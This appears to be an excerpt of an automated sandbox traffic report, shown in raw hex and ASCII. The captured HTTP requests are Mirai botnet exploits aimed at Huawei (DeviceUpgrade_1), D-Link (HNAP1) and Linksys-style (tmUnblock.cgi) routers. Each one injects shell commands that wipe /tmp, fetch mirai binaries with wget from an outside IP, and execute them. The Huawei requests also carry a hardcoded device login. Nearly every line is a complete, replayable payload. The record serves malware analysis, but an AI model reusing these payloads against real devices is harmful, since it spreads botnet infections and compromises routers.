74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POSTData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
